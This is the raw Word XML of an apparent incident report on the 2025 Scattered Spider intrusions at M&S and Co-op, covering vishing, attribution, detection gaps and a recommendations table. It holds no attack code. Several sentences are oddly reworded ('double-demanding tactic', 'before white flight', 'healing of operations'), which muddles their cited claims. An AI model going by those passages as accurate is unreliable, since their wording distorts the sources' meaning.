        <w:t xml:space="preserve"> Factors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C539D0E" w14:textId="7C2EB86C" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="00CD1657" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The Vishing process at Scattered Spider takes into consideration a wide range of open-source intelligence (OSINT) collection via LinkedIn, before calls are made, a combination of publicly accessible employee profiles and created sense of urgency are combined to sidestep organisational mistrust [5][7]. A study by ReliaQuest [5] articulates the multi-phase social-engineering courses </w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">that are designed to defeat the traditional verification said. The National Cyber Security Centre (NCSC) [7] or </w:t>
      </w:r>
      <w:r w:rsidR="00534FB1" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Info-Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Europe [23] both promote the use of multi-channel identity-checking processes when any or other privileged-accounts are reset, thus classifying this as a potentially malicious request by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D170058" w14:textId="06750385" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="00CD1657" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4D5495" w14:textId="77777777" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="00CD1657" w:rsidP="002B14B2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.  Threat Actor Profile and Motive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596CEEB2" w14:textId="3B865A73" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="0071136F" w:rsidP="000B2DA7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>5.1 Attribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E55F5E" w14:textId="77777777" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="00CD1657" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Through a high degree of certainty, it is linked to the cybercriminal group Scattered Spider (also known as UNC3944, Octo Tempest, or G1015). This is because the group was identified as the main attackers by the Metropolitan Police Service by May 2025 virtual [17], the group sent a Dragonforce ransom note to Stuart Machin virtual [2], and a technical tactics, techniques, and procedures (TTP fingerprint) indicating methods that identify the group is consistent with those that MITRE characterises Scattered Spider as one of the native-speaking cybercriminal organisations that have been active since at least 2022.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5353FF0C" w14:textId="77777777" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="00CD1657" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>According to MITRE, Scattered Spider is one of the English-speaking, native-speaking cybercriminals that have been active since at least 2022. It is dispersed around the United States and the United Kingdom, is primarily composed of individuals in their teens to mid-twenties, and has a connection to the Com hacking network [4][20]. It is shown that the gang uses sophisticated social engineering techniques and, rather than creating its own malware, uses commercially accessible Ransomware-as-a-service like ALPHV, RansomHub, and DragonForce [4][25][26].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39683097" w14:textId="7EB18EFB" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="0071136F" w:rsidP="000B2DA7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>5.2 Motive</w:t>
      </w:r>
      <w:r w:rsidR="00CD1657" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Capability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F79FB51" w14:textId="77777777" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="00CD1657" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The driving force behind Scattered Spider's activities is purely financial. The attack used a double-demanding tactic, where the data of targeted systems was encrypted to disrupt the healing of operations, and a simultaneous data exfiltration scheme was employed to force conformity to prevent regulatory violations and image harm [2][21]. There is no reliable fact that can point towards state backing or ideology-driven. The history of targeting of collectives, such as attacks against MGM Resorts and Caesars in 2023, Transport for London in 2024, and a 2025 UK shopping spree, follows a trend of opportunistic targeting of high-revenue digitally reliant organisations with financial motives. Assessment of capabilities shows a moderate to high level of social engineering, a moderate level of technical execution, and no significant awareness of developing zero-day exploits. The 2025 change in operational direction that could present itself as the use of attacker-in-the-middle (AiTM) phishing methods (as demonstrated in [22]) and ESXi-targeting ransomware (as seen in [9]) could be seen as a gradual increase. Scattered Spider, according to IT Pro [25], has integrated elements of LAPSUS$ and 2025 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ShinyHunters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tradecrafts, causing defenders to predict a path of increasingly sophisticated operations in the future.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4388D5F8" w14:textId="77777777" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="00CD1657" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="405A700C" w14:textId="7CC73614" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="00CD1657" w:rsidP="002B14B2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.  Detection and Response Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0A3840" w14:textId="77777777" w:rsidR="00CD1657" w:rsidRPr="00C668B5" w:rsidRDefault="00CD1657" w:rsidP="000B2DA7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>6.1 M&amp;S - Late Discovery, Catastrophic Effect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B0226A" w14:textId="46B4F9E9" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The lack of detection of the intrusion by M&amp;S amounted to a foundational breach: eight weeks had already elapsed between the initial compromise and the decryption of ransomware, and no data was registered on the incident whatsoever [15][2]. This result indicates that lateral movement with valid credentials did not result in </w:t>
      </w:r>
      <w:r w:rsidR="00534FB1" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>behavioral</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> anomaly warnings, exfiltration of NTDS.dit could not be traced, or </w:t>
      </w:r>
      <w:r w:rsidR="00534FB1" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>behavioral</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> anomaly warnings were not triggered and were not addressed according to canonical detection gaps defined in MITRE D3FEND and NCSC guidelines [7][10]. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F978F0" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When it became apparent, M&amp;S reacted significantly fast; the company reported the incident to the NCSC, hired the services of external incident-response experts, and reported the incident to the stock market on 22 April [17]. However, the following 46-day ban on internet sales highlights the shortcomings of resilience architecture, including the lack of backups of virtual machines that cannot be changed and improperly tested disaster-recovery processes [2][18]. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71509264" w14:textId="42AD4349" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="000B2DA7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 </w:t>
      </w:r>
      <w:r w:rsidR="00534FB1" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">his Co -op - Previous Containment, Lost Operational Impact. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1368AF" w14:textId="20F71307" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Co-op's response is an educational opportunity. When the vulnerability was discovered on April 30, nine days after M &amp; S's disclosure, Co-op staff members were promptly instructed to cease using the VPN and see internal communications as potentially compromised [7][19]. Because the DragonForce ransomware was unable to execute on production systems due to this expedited activation, there was a notable decrease in operational disruption when compared to M&amp;S. However, by this time, significant PII leaks between the members had already occurred, and Windows domain controller restarts were still required, indicating that the level of compromise before white</w:t>
      </w:r>
      <w:r w:rsidR="00534FB1" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">flight was extremely high. The Co-operative case shows that even a partial containment, made possible by the awareness raised by the M&amp;S company's public disclosure, can considerably reduce the impact of the incidents, confirming the strategic value of cross-sector intelligence sharing and NCSC sector Trust Groups [7] [27]. </w:t>
      </w:r>
      <w:r w:rsidR="00096218" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ransomware attacks are growing at a rate of 50 percent each year, as identified by the report of the NCC Group of 2025 [28]. Consequently, it is possible to classify such incidents as a systemic threat on the national level, which justifies a coordinated policy response. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A3D5A6" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="002B14B2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7.  Strategic Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F460BB" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The ten suggestions listed below are ranked according to their impact on risk reduction and are based on peer-reviewed zero-trust architecture literature [13], Mandiant hardening advisories [8][9], and NCSC guidelines [7]. Cost bands are representative of a large company with 5,000–65,000 workers.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable1Light"/>
        <w:tblW w:w="9493" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="540"/>
        <w:gridCol w:w="1715"/>
        <w:gridCol w:w="855"/>
        <w:gridCol w:w="1369"/>
        <w:gridCol w:w="4112"/>
        <w:gridCol w:w="902"/>
      </w:tblGrid>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="79CB123D" w14:textId="77777777" w:rsidTr="0051437F">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547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3979CE58" w14:textId="1229671C" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00415F2D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10EDC9B5" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00415F2D">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Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="857" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D5FE007" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00415F2D">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Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="322213A8" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="0051437F">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Cost (est.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6058E6D3" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00415F2D">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Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D9C21D7" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00415F2D">
            <w:pPr>
              <w:jc w:val="center"/>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Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="3A542B0E" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E87A5E4" w14:textId="10DDBA3C" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DDA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34F42639" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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FIDO2 / Passkey MFA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="857" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="156B1F11" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DD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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49939828" w14:textId="211F10D1" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="00CB5DDA" w:rsidP="0051437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£5k – £20k</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E410D39" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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Eliminates vishing MFA-bypass (T1650) and AiTM session-hijack (T1557) vectors. Highest-impact control per NCSC [7] and Mandiant [8].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60A5239D" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00415F2D">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[7][8][13]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="75E12F18" w14:textId="77777777" w:rsidTr="0051437F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A049CF0" w14:textId="253E4CCA" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00CB5DDA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E058FC3" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64"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Helpdesk ID Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
